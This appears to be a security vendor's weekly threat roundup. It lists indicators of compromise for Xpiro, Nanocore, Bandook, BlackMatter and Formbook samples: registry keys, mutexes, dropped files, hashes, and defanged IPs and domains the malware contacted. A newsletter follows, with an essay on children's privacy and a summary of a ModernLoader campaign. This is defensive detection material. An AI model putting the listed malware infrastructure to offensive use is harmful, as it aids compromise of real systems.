%APPDATA%\hqbkc1l0.fyj\Firefox\Profiles\1lcuq8ab.default 1
%APPDATA%\hqbkc1l0.fyj\Firefox\Profiles\1lcuq8ab.default\cookies.sqlite 1
%APPDATA%\services\services.exe 1
%APPDATA%\jntv4ane.ztp 1
*See JSON for more IOCs

File Hashes

02876781ecf3b9c9dfa90f74ef4fb7d6bb60a35a2c09d3895dff3b6d5a1ebb8b 3030ebe65fb01ddf2cbc83340226a872a0a156d8dc3b4a6faaaef651e3d83e1c 3cc3993e6a4ebfc9cb0f9b3b0859d067648d988b77f993aea203ac80179b97d4 5e87c3c6d7b7b6bacb185a11916876fff30634d7f62e4856634b2ee9238618de 671cd596e79c90f7c37085ba263ae4d677edfee99fc3c8306b8ec6d85133e2af 8e433d9d938adaad4c710c6ea1d24aad1689eb96e33d4cc2e81120c9c4d54197 9aa8ef433012e7b4662a4e36dd41df76b5be268f7cc2073a7361467509d5256a 9ffdf9f36b00abef356517cf38d5bf881959ebbf7af9474b1bd3e673db97cd54 b62a36fa9279443fd389580f809b95a37b0de981ec7c4338826e9ee859ce4847 b91c165d0aa38b11ab8dd8d8d00a460b78302c331478cc04b60f98eddecb1356 f8ce5974e752acd2cb2e90690eb86bb5246cc736482cae4578619cc861dcaaf5

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Virus.Xpiro-9965977-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 45 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Type
45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Type
45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Type
45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Start
45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Type
45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Start
45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
Value Name: Type
45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
Value Name: Start
45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500 45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: EnableNotifications
45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Start
45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Start
45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MSSQLSERVER 45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MSSQLSERVER\CLIENT 45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MSSQLSERVER\CLIENT\DB-LIB 45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MSSQLSERVER\CLIENT\SUPERSOCKETNETLIB 45
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE
Value Name: AccumulatedWaitIdleTime
45
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE
Value Name: RootstoreDirty
45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE
Value Name: AccumulatedWaitIdleTime
45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE
Value Name: RootstoreDirty
45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MSSQLSERVER\CLIENT\SUPERSOCKETNETLIB
Value Name: Encrypt
45
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MSSQLSERVER\CLIENT
Value Name: SharedMemoryOn
45
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64
Value Name: Type
44
Mutexes Occurrences
kkq-vx_mtx62 45
kkq-vx_mtx63 45
kkq-vx_mtx64 45
kkq-vx_mtx65 45
kkq-vx_mtx66 45
kkq-vx_mtx67 45
kkq-vx_mtx68 45
kkq-vx_mtx69 45
kkq-vx_mtx70 45
kkq-vx_mtx71 45
kkq-vx_mtx72 45
kkq-vx_mtx73 45
kkq-vx_mtx74 45
kkq-vx_mtx75 45
kkq-vx_mtx76 45
kkq-vx_mtx77 45
kkq-vx_mtx78 45
kkq-vx_mtx79 45
kkq-vx_mtx80 45
kkq-vx_mtx81 45
kkq-vx_mtx82 45
kkq-vx_mtx83 45
kkq-vx_mtx84 45
kkq-vx_mtx85 45
kkq-vx_mtx86 45
*See JSON for more IOCs
Files and or directories created Occurrences
%CommonProgramFiles%\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE 45
%CommonProgramFiles(x86)%\microsoft shared\Source Engine\OSE.EXE 45
%ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE 45
%ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe 45
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe 45
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe 45
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 45
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 45
%System32%\alg.exe 45
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.log 45
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log 45
%SystemRoot%\SysWOW64\svchost.exe 45
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log 45
%SystemRoot%\SysWOW64\svchost.vir 45
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat 45
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.lock 45
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngenservicelock.dat 45
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.lock 45
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngenservicelock.dat 45
%CommonProgramFiles(x86)%\microsoft shared\source engine\ose.vir 45
%ProgramFiles(x86)%\microsoft office\office14\groove.vir 45
%ProgramFiles(x86)%\mozilla maintenance service\maintenanceservice.vir 45
%CommonProgramFiles%\microsoft shared\officesoftwareprotectionplatform\osppsvc.vir 45
%SystemRoot%\microsoft.net\framework64\v2.0.50727\mscorsvw.vir 45
%SystemRoot%\microsoft.net\framework64\v4.0.30319\mscorsvw.vir 45
*See JSON for more IOCs

File Hashes

07883b2bec4bb5804938dec4b37619c77ad9fc925b52bdd4368faa9416afdbf2 118989bae4bc156627ed91ecc03e9a9a01635f624b00dad94c801ba95da08130 127b5c9fee91c095376a75ee583bc452c269735a94a9381bd262c5cfd2163deb 150587b20269ad5520861cd61fd6eeceddd61e5e05ff27de39189542e1f6f45a 171d6d2f93370d7afd1875a1f7d0a59aef5d46a7d553df98d12855cca5d437a6 1bcb487b3582e158e38e1d76365254022f18a3033c9ca23b5da0c964ead1147a 1d2f153a4f58438ad61950c4468b95358d5aab9356f138d7b74dcadec2afdae1 22ccda550e90cbdc7b115fc3b2d082190df9935b01ea1d8c3923445c759aa477 270a4deb05747829e8a95f5718214bce934ab251f204d1828e3d2a1201caab1d 2817d1aa30164faad40ff66eea5743106219fe83b20ae96523be7691ffbf467b 2b89cd04def8bda3701849a58ebca23151b94b98db25351c7b98d0228d021db7 2d8fcc7e70b0b9721164bf886c297355030b7c7af7904898c96757c522fe051c 2ffe5d618f015af6681482a2347ccb631eb7df646d2d619c38fdb5fc70786ae3 3d61c2d8682ba543026d4a1afa98409938bc28fd09aa327e1058c8abbf9d44b8 3f11dec1f3cd0e3ef1fe0249d656394c2053ae2dd834328d82a7a5b8e7c75a88 44515f7babd049693c6941b93b09f39944caf9038e0216ecf3cdd5ec2a02bb19 4683415d7ef8a0aff6a2cba601d70a150391e59dd8dd4cdb71c6024bfffd9fd5 515cf18bdd0820d02b2233b2ff897e3e957db3d90c9b977ab3480dc4360bb749 537eb171bbe2059013f3b5335724a5da631085ca038e0e1c9082c352e9373d0f 565d18219289992baa30b55dc7d41f0eb74bd557c47305d80257aab8f2dd43f9 5de1d780d6bb9e646e53613cd36bede221b8fd79f2ebe461c075eb1c29fa596b 6e92ff9fc26469a4ab8d7e380a54192d9f3d9a8c7022797053734594b5ebfbc8 73505bcbd55074beee93cc69877a5c6fa1a52b21ef59c9935292daa776e79563 761445a4c924c9575115b2df05a6340b213b88ce4433ef81d0758ee5b794e42d 76f07678f7860611016dd78352f83e636be8686ec312ec869fc4a170249bb93a
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Nanocore-9965501-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Firefox
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Google Chrome
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Rauzvon
2
Mutexes Occurrences
Global\{507a688d-5e7f-4ee3-978d-22cfb8649ae5} 6
IuRNZvTk9FliRK7fos 3
85af4115-b1eb-4cf2-a465-c0c97232a10e 2
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
208[.]95[.]112[.]1 3
194[.]233[.]95[.]52 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
maniac[.]http80[.]info 6
ip-api[.]com 3
zub[.]http80[.]info 3
salak[.]pw 2
methodist[.]sch[.]id 1
Files and or directories created Occurrences
%TEMP%\subfolder 9
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 6
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs 6
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator 6
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat 6
%TEMP%\subfolder\firefox.exe 6
%TEMP%\subfolder\firefox.vbs 6
%APPDATA%\Logs 3
%APPDATA%\Logs\08-27-2022 3
%TEMP%\subfolder\chromee.exe 3
%TEMP%\subfolder\chromee.vbs 3
%TEMP%\Rezmac 2
%TEMP%\Rezmac\reuzcms.exe 2
%TEMP%\Rezmac\reuzcms.vbs 2

File Hashes

18402b2ca4fc7f307ac6df1c12224af6233b42e157d048524ff02eabc5574b3a 2ae13d3cf6ee39ceac1add91e50c25860fa9bc2a9768f1cc5e623211659b14f2 2f9bd77b89fd409ab141f02853f28979675cc109a5b0841476d23b046ffd1a1e 2fc799408a67dc0a572a65bb27b2390731a64984f60409ce054469e2a7a6a46b 374f83f762b8894f5cf1b48334e4ca74ba0664d39f0367e80e3065b138fc9643 83ed0a21ba22c6c5029a5c4d7bc520a6c01665a34d5a085baeb14299d2fb611e 8f1cf8c17179a49c27b10c2ab14b47a2f97b24dcf51483349138a2eb7e10be20 969401a830e00003b591c0123c7ded0e52ceb274b31714fb199bb1ed155a4e67 a51a1959e27231e0cfbecc2dae8144a3ddbca1721bafc8a4ff09e3dd2a6f65e2 ba08670b6879155fa420eed444e3835d2d5fa94061e87d5c27a0b0eaf8a1c847 d4624f001b7c6081a9fe97fa1385cb6ff0f78adeeb9408a4ac0bc26dd2e3925c eac6474104a6ccaa562bc3de90adaf756c236fcc19e3d9db96047c269f664cce

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Packed.Bandook-9965180-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 14 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION
Value Name: SysHelper
14
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
14
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: SysHelper
14
Mutexes Occurrences
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 14
Global\<random guid> 12
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
162[.]0[.]217[.]254 14
149[.]154[.]167[.]99 12
116[.]202[.]178[.]78 11
211[.]53[.]230[.]67 5
116[.]121[.]62[.]237 3
109[.]102[.]255[.]230 2
115[.]88[.]24[.]202 2
210[.]182[.]29[.]70 2
186[.]7[.]80[.]197 2
41[.]41[.]255[.]235 1
110[.]14[.]121[.]125 1
222[.]236[.]49[.]124 1
211[.]40[.]39[.]251 1
211[.]171[.]233[.]126 1
190[.]219[.]54[.]242 1
195[.]158[.]3[.]162 1
58[.]235[.]189[.]192 1
187[.]190[.]48[.]135 1
187[.]195[.]212[.]6 1
189[.]164[.]252[.]207 1
88[.]198[.]122[.]116 1
201[.]22[.]188[.]119 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]2ip[.]ua 14
rgyui[.]top 14
acacaca[.]org 14
t[.]me 12
Files and or directories created Occurrences
I:\5d2860c89d774.jpg 14
\SystemID 14
\SystemID\PersonalID.txt 14
%LOCALAPPDATA%\bowsakkdestx.txt 14
%System32%\Tasks\Time Trigger Task 14
%LOCALAPPDATA%\3856b5d6-9eb0-496c-b0d1-db92b0f6ed65 14
%ProgramData%\freebl3.dll 12
%ProgramData%\mozglue.dll 12
%ProgramData%\msvcp140.dll 12
%ProgramData%\nss3.dll 12
%ProgramData%\softokn3.dll 12
%ProgramData%\vcruntime140.dll 12
%LOCALAPPDATA%\7c34bb01-5d78-49c4-8bbb-73fdc7aa1262 12
%LOCALAPPDATA%\7c34bb01-5d78-49c4-8bbb-73fdc7aa1262\build2.exe 11
%LOCALAPPDATA%\66848c81-aae5-4fb7-b7d5-caf7cfaf5685\build2.exe 2
%ProgramData%\38004316577355091428719705 2
%ProgramData%\38004316577355091428719705-shm 2
%ProgramData%\38004316577355091428719705-wal 2
%ProgramData%\71584480118905964190690196 1
%LOCALAPPDATA%\3856b5d6-9eb0-496c-b0d1-db92b0f6ed65\e06bf2d61685bb0e8d57d45e278c965ea7a4fda6e9eae6a8ef9dea226f089dcd.exe 1
%ProgramData%\74266566668491997434247038 1
%ProgramData%\08802376146419947648049053 1
%ProgramData%\78905701483251681848013193 1
%ProgramData%\87138039098365190229474947 1
%ProgramData%\11794213916832836750166526 1
*See JSON for more IOCs

File Hashes

01983ca201f706146be28b5533ee7d96bdf48dcb27e49859366ccb2c8ad86447 0ad916703820d701658f7a8979bad219b7785517a4d3756e9cd7f45018c88f2a 56cd4a53bf45294705a27acc356f8bc2621d48e902ef6ebc739622ae6f93ca6d 5aceb15695c7bb34d473ad77b0bd26e3c63d1b76e3ad4e9bdd5c790e16daf27a 649c98faeafe332823d7c78c2cad20f00f3e23ea85bfccc744a8ea003b58db07 71c7d15d6d1ec0964b2b5a53ff9c71377978e00b297dceb6d958d10a9d2c30a0 79e53831488d7cf38bb7d23afa49a79ff5ec83003dc5b7d061b25689af111a47 84fad9f56332fd8d21e6a4aa6e73b168a02603a8329fa084f11496484f1aeedb 8c61ec9a90c74ae499c8d62d81478addbed60084b54fdb7873edbd3fd604c3d0 a4c1acf7975cb9fa1e3c191dd6f644159e24008929d54b1fbf716523ad06508e afc2efd52b6d261df9f8e6f45a80480f6873281980ce5accc3b64cd00b630727 c31c18f761d14cbaaff14a15cb1c15937c9d9a9910f1db2823e8b89b1fbc14e3 c3f9b1f639069bea05ced05cb4971720f6ae0bdca58ac1d3be31829513ce4d58 e06bf2d61685bb0e8d57d45e278c965ea7a4fda6e9eae6a8ef9dea226f089dcd

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Ransomware.BlackMatter-9965914-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS
Value Name: DeleteFlag
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS
Value Name: Start
17
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER
Value Name: GlobalAssocChangedCounter
16
Mutexes Occurrences
Local\SHResolveLibrary:C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Libraries/Music.library-ms 2
Global\160e9ee717cce91f13d77a3a825f0c36 2
Global\97dd24c9bf8e7c0cbf96f37f87229698 1
Global\d33eaa6f804fb26ad354969330593cc2 1
Global\87157f060adf9f831ce0dc0cb3f23616 1
Global\894f56e5131f56d3248c4e688de24b70 1
Global\e3bb7e34789420de468428f3c22d9d74 1
Global\21cb1589097551b53e4b6dd91c431ec7 1
Global\1bb52c4380360c6c5ede0e9633f41905 1
Global\286849ac1f88a55fdd83f9a2fd92cc8c 1
Global\911dfc525e2ca360ae05fdde5aa84df4 1
Global\64b3e687a1e5d07fe5e0c7a162866a7b 1
Global\ca37097bb37bda10e9e84e42619ea25e 1
Global\f95807e1444ab674c068082d2b3a4883 1
Global\9a70b72fa75e9f9c3e2497457d332c26 1
Global\ea05f6895900370af4c4072c97ed86a2 1
Global\00348b0aaf40155607fc2b57eb660ea0 1
Files and or directories created Occurrences
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-1002\desktop.ini 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I08BO8F.xlsx 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I11KHR4.doc 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I5QKHLN.doc 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I62TWBD.ppt 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I6FZORX.doc 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IABMX83.pdf 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IAJ2Y6R.pdf 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IALGTCS.xlsx 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IAPSNOM.tsv 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IGORSF7.xsn 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IGTBBSA.accdb 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IH49RPF.ppt 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IH71GGR.ppt 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IJKODPH.pdf 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IJP965K.accdb 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IKY5R3M.pdf 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IMYCSIT.pdf 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$ISLP722.doc 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IXLC77A.pdf 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IXUL2U1.doc 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IYSR1FU.ppt 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IZ2GMJW.XLSX 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R08BO8F.xlsx 17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$R11KHR4.doc 17
*See JSON for more IOCs

File Hashes

00d3f19ff84cddc5b0cfc9d9b053a99b493add5a9bf8ec74659ef9b3d9298de6 0400ee8269aba8f79bfd0c65f64689b06febae22a7535c9fda728a7eaa29ae0d 060bd55768e0edc037651bf50c54248e9451d57d4da795b9d8ea03829085cea1 0bfd5fbf610b76c84abbdefcdaee8c0d09c002e40f69fe86db39478931aea73a 15f56da9d9888fbad8bc428b72b4d06c736b38392ff41b94ae06c27864a9dee1 2e641dbe994f931adeff6b65fb9db481a42717454a0ea6b1e2222ba24d890fa9 333f19529de011757c299888e57b8d37801b6adbf7e2d270b71726150aeef90c 4707b114756307df755bbe231a468d02503d82947d32f9037d011075d826445e 55b45145bf1ed50d1e72c74c0743ce36e279a10e55dada004824f3eb7db5646d 80e9ee47dafde64d31cf494ecea11923f5b1646d5e8bc9d7e51999bd79334db5 95ddbeacd79ad7d944e75f55ca323a13076b756c4accefd28e206a76b3ea268b 9c25081891c1c1ff09c6bde2e8a9bed6022d6cc9edda9abdd7a771f68264bce6 a24db7475958186ec57258d44edd465b1a060b52aff714e7f261cce41d052deb a6f7f973e63f3c2ef886a98663bd4aa08deb3ec9a4a8c60ead43ce5a9b9787f5 e4eda1e494929b5bf8a5affbbe56d8fa89e4868042cf844c9124d58c9094d77b e5bb89bea6c854818b9b5884bf9e46e51873ccba73e73ef61ff2e63def151ce0 fe20b163358d90a39f3afc632dedd029231428474dd42c71a333b2a6d514f1e8

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Formbook-9965920-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Mutexes Occurrences
8-3503835SZBFHHZ 1
S-1-5-21-2580483-1244278791147 1
3Q694U0B59Bv9yz0 1
Files and or directories created Occurrences
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\sdhoston.vbs 1
%APPDATA%\sdhoston 1
%APPDATA%\sdhoston\sdhoston.exe 1
%APPDATA%\sdhoston\sdhoston.exe:ZoneIdentifier 1

File Hashes

01bb00216bf6742ac525cb9c6bfefefd250ab0ad14f477c2aad4146b7ea3336e 0f32a114f06e8282588d6e5e47063bcf79348d49744f0acc72b01c296be229a0 103fa3b007fc5e06fccd36f15eddc56071666c220a74ae20d851e635a0aede78 142e773ad2c9e16c377fbf9c61e93eafac2bea3d863c360c8cbd6b2d54082a51 1cfad9e7b4cff0eb8814b80f2281980982f0b2085c6247eac8cc930db08a173b 1e7afe66d3b124abf916c542d5e5fbc1b8922bc928eba5e406bca0b39f0d7019 1fb04ac0a06d4f3598c0ee3533a28b87fe2a0e7af4e13e49e76b9e13a39bc256 215ab3d9e9b4caadde378383717a29b9a52f97ffdd38ef26dd5453b896c72442 24a08963a436434d2ed1a6f82fea0e7b18ad037e6a602ca5dfbe740a11f6fbcf 2c73b7270d050779ac974267fe31ce3ca2d93d8c6a2cc2b1dccef1ef358ffd95 30c8eaf7b304700c5b3a61fa740e3ebb930b03302ad2cc3805fa38d106d302d5 33773be67a946828b9d2c89ba742fbcf71ffd03988291e243ee3744081060cc3 375b00de8de38ec7af0a4b0bef42ed556ce7d5c141c8b72389700ad34d1bd461 3af09a9a2fd53cbafcbb7925f694b8d37f1fd2d40f0f1600288021909b7c4335 3c5895384984695318ac23be4049b059aa60980d614fac5c5a88bf6b0fdb22d5 4b98da8fd57d0c095683b4d3ce85b2120ac8759c184934528105eecd3cb1971b 4ba20254c0e238f1ca4c86b1ebd13536dbd2d7d5bd248ab60e887a22bba9fc26 5a2c975aaa1ed0b722bb5f4098be703728b5419ab1d52616866962bb0fc3c520 5a2eda2ada26ec8e4794d472275294cbd1de7acdad334182798a7a6a1ff4e194 5b24d13171a030fd84cf2638a9072121b1919aa8e02a1170bd247eb3f07fde6a 5f1f6aed00db04bcc2079784d758151589dbcf3eda4394711336cb0a7f7802e4 5ffa9c9d4e5f28a60c40c42b6ccb84eb39be453f556a18cc25ca2d7e3efc80f3 67081c3564081660f61db2b0e4ec525a16bfe0250d8d7496a49bb65aaafffd24 6d00edf9e45e24712b2aa52af50be59081ebf770571a09c6001046dd77ecdc53 6ff434f03d48677e5768cc58c83aa817790fd9506376837e802eaab90a9d5975
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Threat Source newsletter (Sept. 1, 2022) — Conversations about an unborn baby's privacy

1 September 2022 at 18:00


By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

This week marks about 90 days before my wife’s due date with our first child, a baby girl. We’re both incredibly excited and nervous at the same time, and we have much to discuss, like how to lay out the nursery, what times we’ll put her down for a nap and who must be the one to get up the first time she starts crying at 2 a.m. 

But the first true argument my wife and I have had about having a child is whether we should show the baby’s face on Instagram. 

This child isn’t even born yet, and social media companies are probably already building out a data profile on her. I signed up for the What to Expect app so I could follow along with my wife’s pregnancy progress and learn more about what she’s going through and how the baby is developing. Already I’m getting targeted ads on the app and my Instagram for specific brands of baby food, the stroller that we’ve listed on our registry and an automatic children’s toothbrush. Celebrities are increasingly choosing to not show their babies’ faces on social media for paparazzi and physical privacy reasons, which makes sense. But I’m already starting to question what types of privacy decisions I need to make on my daughter's behalf before she’s old enough to know what she’s getting herself into, and I don’t even have to worry about someone selling a picture of my baby to People magazine for $1 million. 

The site we’re using for our baby registry was already asking for her name (we’re not telling anyone the name until she’s born) and my wife’s due date, so conceivably, they’ll know when the general time frame when she’s born. Then what will Amazon start learning about our baby if we use our home assistant to order diapers and food refills? If we use an app to track her sleeping habits and eating schedule, what else could an app conceivably learn and eventually use to send me more targeted ads?  

Refusing to post my baby on Instagram is, admittedly, probably a bridge too far. After all, how else am I going to brag about how cute she is?  

But there are real physical security concerns about posting pictures of children on social media, because some of these sites can, unfortunately, become places where criminals seek out younger victims. Or what happens when she turns 13 and decides she actually doesn’t want to be on the internet? I didn’t get her consent when she was two weeks old, so can I scrub everything the internet already knows about her? 

There really aren’t any systems in place to inform parents about how the pictures or information they share about their children is being used. And most parents certainly aren’t digging deep into Meta’s privacy policy.  

I think, generally, a good rule of thumb is that anything you post on social media could get out of your control. Even with a private Instagram account, there’s no guarantee someone can’t take a screenshot of your post and then share it with someone else. And unless the parents completely plan on going dark off the internet, there’s no real way to work around this.  

When my daughter is born, I’m sure I won't be able to resist sharing her name and her cute outfits on Instagram. But it is interesting to consider the privacy implications of doing so. When my parents stuck a VHS camcorder in my face when I was first born, I don’t think they had to worry about a multi-billion dollar company somehow using that to sell them Wi-Fi-connected diapers.  
  

The one big thing 

An unknown threat actor is using the ModernLoader RAT to spread several other types of malware, including cryptominers and information-stealers. The actors are attempting to compromise vulnerable web applications to serve malware and deliver threats via files masquerading as fake Amazon gift cards. Eventually, it downloads ModernLoader, which can bring other malware families to the party, including the RedLine stealer and XMRig cryptocurrency miner. While this campaign has, so far, mainly targeted Eastern Europe, the actors have been able to obscure their work enough that it’s difficult to identify who they target next or what the attackers’ previous patterns are. 

Why do I care? 

Although the scope of this attack is thus far limited, the attackers in this case seem to be fairly sophisticated, and the use of off-the-shelf tools means it’s tough to track them or attribute these campaigns to a known APT. The infostealers ModernLoader drops can steal users’ important login credentials or important information about the targeted machine, which could be used in future attacks. And any cryptominer has the potential to sap the target machine’s power, costing the target time and money.  

So now what? 

Talos has released new Snort rules and OS Queries to detect activities from this campaign, so those should be deployed immediately. This actor seems to mainly rely on fake offers for Amazon gift cards, so be extra vigilant for those types of scams, even though you already should be on high alert for any deal that seems too good to be true. 

 

Top security headlines from the week


